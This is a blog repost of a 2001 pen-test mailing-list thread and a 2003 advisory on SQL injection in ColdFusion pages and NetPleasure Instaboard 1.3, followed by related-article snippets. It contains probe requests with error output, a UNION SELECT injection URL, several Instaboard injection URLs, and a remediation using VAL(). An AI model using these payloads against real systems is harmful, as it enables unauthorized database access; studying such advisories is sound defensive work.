CFM SQL injection

最新推荐文章于 2025-07-14 13:45:36 发布
原创 最新推荐文章于 2025-07-14 13:45:36 发布 · 2.3k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #coldfusion #sql server #processing #microsoft #query

博客围绕ColdFusion平台上的SQL注入问题展开。有人在对安装ColdFusion的网站进行渗透测试时,遇到服务器不理解参数、出现SQL数据库错误等情况,还给出多个测试请求及结果。此外,还提及NetPleasure的Instaboard存在多个SQL注入漏洞及相应解决建议。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

呵呵,基本和asp类似了,不过要看是什么平台支撑着,

文档有二篇,是以问问题的形式给出,发现国外对计算机上不管是教学还是文章,

都会比国内的教学幽默得多,学习起来轻松许多,哎,什么时候国内才可以变化

这样的情况,估计永远也等不到了,哎!
Quote
It looks like the query that you're attacking isn't prepending and
appending quotes to your input. The string build probably looks a lil'
sumthin' like this:

Query = "SELECT FieldOne, FieldTwo, FieldThree FROM TableName WHERE PageID =
" & strPageID

This means that there is no need to use quotes in order to perform a
successful injection. So, try something like this:

http://www.server.com/page.cfm?page_id=9999 UNION SELECT OtherField FROM
OtherTable WHERE 1=1

Hopefully this will return an error complaining about an invalid table
name, or at least another error that may give you a better idea of what the
web application is doing with your argument.

Kevin Spett
Archbishop of SQL Injection
SPI Dynamics, Inc.

----- Original Message -----
From: "Charlie Liserne" <Chili@SexMagnet.com>
To: <pen-test@securityfocus.com>
Sent: Saturday, December 15, 2001 2:22 PM
Subject: CFM SQL injection

> Hello guys,
>
> I'm performing a pen-test against a web with Coldfusion installed. I
obtain
> some error information, but I'm not able to do nothing because the server
> never understand the parameters I send.
>
> The correct page is as follows:
> http://www.server.com/page.cfm?page_id=8
>
> My probes are following:
>
> -------------------
> Request: http://www.server.com/page.cfm?page_id=8&#39;
>
> Result:
> Invalid parameter type
> Cannot convert 19' to number.
> Please, check the ColdFusion manual for the allowed conversions between
> data types
> The error occurred while processing an element with a general identifier
of
> (CFPARAM), occupying document position (5:1) to (5:61).
> Template: c:/blabla/page.cfm
> Query String: page_id=19'
> ------------------------
>
> So it isn't interpreting the ' and I don't know how to execute commands.
It
> seems that it is not an SQL issue, instead it looks a coldfusion error.
> Another probe follows:
>
> --------------------
> Request: http://www.server.com/page.cfm?page_id=0
>
> Result:
> ODBC Error Code = 37000 (Syntax error or access violation)
> [Microsoft][ODBC SQL Server Driver][SQL Server]Line 3: Incorrect syntax
> near '='.
> The error occurred while processing an element with a general identifier
of
> (CFQUERY), occupying document position (15:1) to (16:65).
> ------------------
>
> Okay, i get an error from the SQL database. But still don't know how to
> take advantage of it. I don't know the database name and I have very
little
> info about it.
>
> Also, there are two more interesting probes:
> ---------------------------
> Request: http://www.server.com/page.cfm?page_id=3,
>
> Result:
> Invalid parameter type
> Cannot convert 3, to number.
> Please, check the ColdFusion manual for the allowed conversions between
> data types
> The error occurred while processing an element with a general identifier
of
> (CFPARAM), occupying document position (5:1) to (5:61).
> ----------------------------
> Request: http://www.server.com/page.cfm?page_id=3,4
>
> Result:
> ODBC Error Code = 37000 (Syntax error or access violation)
> [Microsoft][ODBC SQL Server Driver][SQL Server]Line 3: Incorrect syntax
> near ','.
> The error occurred while processing an element with a general identifier
of
> (CFQUERY), occupying document position (6:1) to (6:72).
> -------------------------------
>
> Do you know how to exploit this (if it's possible)?
>
> Regards,
> Charlie.
>
Quote
Affected Product: NetPleasure's Instaboard 1.3
www.netpleasure.com/instaboard/

Venerability: Multiple SQL Injection Vunerabilities.

http://server/instaboard/index.cfm?frmid=1%20AND%20u.userid%20IN%20(select%20userid%20from%20users)
http://server/instaboard/index.cfm?frmid=1&tpcid=1%20SQL
http://server/instaboard/index.cfm?frmid=1%20SQL&tpcid=1
http://server/instaboard/index.cfm?pr=replymsg&frmid=1&tpcid=1%20SQL&msgid=11
http://server/instaboard/index.cfm?pr=replymsg&frmid=1&tpcid=1&msgid=11%20SQL
http://server/instaboard/index.cfm?catid=1%20SQL

Notification:
Messages were posted on the Instaboard demo forum, in the "Instaboard 1.3
Troubleshooting and Problems" area, on April 02 2003. As of yet, there has
been no reply publicly or privately from thei author. Author emailed at
instaboard at netpleasure.com on Tue, 8 Apr 2003 16:06:19 -0400

Proposed Solution:
If you have the licensed version of the product, protect the numerical
values within the CFQUERY tags:

for example:
In queries/oraclen/qry_GetOriginalMessage.cfm
change
WHERE m.tpcid = #tpcid#
AND m.userid = u.userid
AND m.msgid = #msgid#

to

WHERE m.tpcid = #VAL(tpcid)#
AND m.userid = u.userid
AND m.msgid = #VAL(msgid)#

--
"Most moms teach their daughters how to run a house, but you? You teach
yours the fine art of mass destruction."
- Nabs - Goodbye is not forever

perl -le '$_="6110>374086;2064208213:90<307;55";tr[0->][ LEOR!AUBGNSTY];print'
JSP SQL injectionの小技
weixin_33953249的博客
11-16 232
信息来源:ESG JP SQL injectionがあるのは判断できるけどエラーがハンドリングされてて エラーメッセージとかから情報がひっぱれず、どうやってもUNIONで 別のSELECTが繋げられないとか、繋げられてもSELECTの直接の結果自体は 画面に表示されない場合なんぞに。 // 考え方 演算子「=」等の単一行条件で項目の値を比較する...
SQL InjectionSQL注入)介绍及SQL Injection***检测工具
weixin_34059951的博客
08-06 93
1.关于SQL Injection 迄今为止,我基本没有看到谁写出一篇很完整的文章,或者说很成熟的解决方案(能做到 的人肯定很多,问题是没有流传开来,很遗憾) 我简单的说几点,希望启发大家思考,起到抛砖引玉的作用   一、SQL Injection的原理 SQL Injection的实现方法和破坏作用有很多,但万变不离其宗,其原理可以概括为一句话 :SQL Injection就是向服务器端提...
Google Dork 2014 List For SQL Injection Attack : Fresh Google Dorks 2014 List
热门推荐
MyDriverC
10-15 1万+
Google Dork 2014 List For SQL Injection Attack : Fresh Google Dorks 2014 List  about.php?cartID=         accinfo.php?cartId=         acclogin.php?cartID=         add.php?bookid=         add_c
ART OF WEB-SQL-INJECTION第2卷 ORACLE篇
Information Security Technology Organization
08-28 1597
ART OF WEB-SQL-INJECTION第2卷 ORACLE篇author : kj021320team: I.S.T.O很多人都说什么ASP PHP JSP注射 其实注射最直接是跟数据库有关!然而那些脚本只是一种辅助例如ASP/ASPX JSP 啥限制都没!而PHP则会把 过滤为/ 但是若然不是MYSQL POSTGRESQL SQLITE的话这个功能就废了!但是我觉得这些脚本语言都
ART OF WEB-SQL-INJECTION第2卷
weixin_30685047的博客
09-03 115
很多人都说什么ASPPHPJSP注射其实注射最直接是跟数据库有关!然而那些脚本只是一种辅助 例如ASP/ASPXJSP啥限制都没!而PHP则会把'过滤为\'但是若然不是MYSQLPOSTGRESQLSQLITE的话这个功能就废了! 但是我觉得这些脚本语言都不狠~如果CFM的话估计你就没折了!具体各数据库相关信息请参看 ARTOFWEB-SQL-INJECTION第1...
SQL注入不完全思路与防注入程序
Influence的专栏
07-23 593
http://www.coldfusionmuse.com/index.cfm/2008/7/18/Injection-Using-CAST-And-ASCIIhttps://forums.microsoft.com/msdn/ShowPost.aspx?PostID=3646993&SiteID=1http://coderui.spaces.live.com/blog/cns!1CC08
代码片段darkBing SQL扫描器实例
aide521521的博客
03-10 468
#!/usr/bin/python002   003import sys, subprocess, re, Queue, urllib, urllib2, threading, random004from xml.dom import minidom005from optparse import OptionParser006from time import sleep007   008def l...
JDBC批处理插入更新MySQL Oracle
从零开始的教程世界
07-20 810
Today we will look into JDBC Batch insert and update examples in MySQL and Oracle databases. Sometimes we need to run bulk queries of a similar kind for a database. For example, loading data from CSV ...
cfm.rar_ssh人事_ssh人事管理_企业人事_企业人事系统
09-22
其次,Spring框架是Java企业级应用的核心,它不仅支持依赖注入(Dependency Injection,DI),还提供了面向切面编程(Aspect-Oriented Programming,AOP)的能力。在人事管理系统中,Spring可以管理所有的bean,包括...
web攻击.pdf
04-21
- **简单的SQL Injection攻击示例**: - 假设登录查询语句为`SELECT * FROM users WHERE login='victor' AND password='123'`。 - 攻击者通过在登录名中输入`' or 1=1 -- '`,密码输入任意值,使查询语句变为`...
MSSQL高级注入技巧:构建畸形SQL语句进行深度盲注
本文主要探讨的是针对MSSQLMicrosoft SQL Server)数据库的高级SQL注入技巧,特别是如何利用“构造畸形语句”进行深入的盲注(Blind Injection)以及寻找关键数据。 首先,我们需要理解SQL注入的基本原理。当用户...
mura
03-14
print("[+] Potential SQL Injection Vulnerability Detected!") else: print("[-] No vulnerability found.") ``` 上述脚本展示了如何测试是否存在简单的SQL注入缺陷。请注意实际操作前需获得目标系统的合法权限...
Oracle数据库实战精要:PL/SQL高效编程
m0_64972409的博客
07-11 566
本文介绍了Oracle数据库的核心特性与PL/SQL编程实践。Oracle作为企业级关系数据库,具备高可用性、安全性和智能化管理能力。文章详细展示了Docker环境下Oracle 19c的安装配置流程,并通过学生选课系统案例系统讲解了PL/SQL编程要点:包括变量声明、条件分支、游标操作(显式/隐式)、异常处理等基础语法;存储过程开发(选课管理、学分调整);程序包实现(院系迁移功能);以及三类触发器应用(审计、约束校验、视图替换)
实现druid数据源密码加密
sunon_的博客
07-11 192
init();} else {init 方法遍历 filters 列表,并逐个初始化。在Druid中有一个 ConfigFilter,该 filter 用于对链接池加密、解密处理。注意事项:filters加上wall配置会严格校验sql格式,--这样的注释不通过会报错${password}: 加密后的密码${publicKey}: 根据密码生成的公钥filters:config : 配置链接其过滤器 config,用于加密数据库密码。
PGVector + PostgreSQL: 你的下一代 AI 应用栈?Render 平台从零到一实战指南
海棠AI实验室
07-12 926
本文介绍了如何使用PGVector扩展将PostgreSQL转变为高性能向量数据库,打造AI应用的"梦中情栈"。文章分为七章,从架构设计到实战部署,详细讲解了PGVector的优势、Render云平台部署、Python集成、性能优化(IVFFlat索引)以及相似度搜索的实现。重点突出了PGVector与业务数据无缝集成的特点、成熟的开源生态和成本效益优势,并通过流程图展示了智能问答系统的完整架构。
【PostgreSQL异常解决】`PostgreSQL`异常之类型转换错误
最新发布
No8g攻城狮的博客
07-14 25
PostgreSQL类型转换错误解决方案摘要 当PostgreSQL出现"operator does not exist: character varying <> integer"错误时,说明存在字符串与整数的直接比较。解决方法包括: 将整数转为字符串:使用CAST(12345 AS TEXT)或'12345' 将字符串转为整数(需确认数据可转换):CAST(username AS INTEGER) 在Java应用中确保参数类型匹配 注意事项: 转换前需验证数据完整性 类型
NoSQL 介绍
2301_80348933的博客
07-13 621
NoSQL数据库技术概述 NoSQL(Not Only SQL)是一类非关系型数据库,作为传统关系型数据库的补充,采用简单的key-value存储模式,具有更强的扩展能力。它的出现主要源于Web2.0时代对高并发读写、海量数据存储和高可用性的需求。NoSQL分为四大类型:键值存储(如Redis)、列存储(如HBase)、文档型(如MongoDB)和图形数据库(如Neo4j),各有其适用场景和优缺点。在分布式环境中,NoSQL遵循CAP理论(一致性、可用性、分区容错性不可兼得),多数系统选择牺牲强一致性换取可
如何成为 PostgreSQL 中级专家
2403_88870967的博客
07-13 305
还能实施严密的安全策略,保障企业核心数据的安全。加入 PostgreSQL 相关的社区和论坛,如重庆思庄 PostgreSQL 学习论坛等,在这些平台上,你可以与来自全国各地的 PostgreSQL 爱好者和专业人士交流经验、分享心得。你可以在社区中提问,寻求他人的帮助和建议,也可以参与讨论,了解其他人在实际项目中遇到的问题和解决方案,获取最新的学习资料和行业动态。此外,重庆思庄在线学习平台上也有丰富的 PostgreSQL 相关课程和学习资源,你可以根据自己的需求和学习进度选择合适的课程进行学习。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值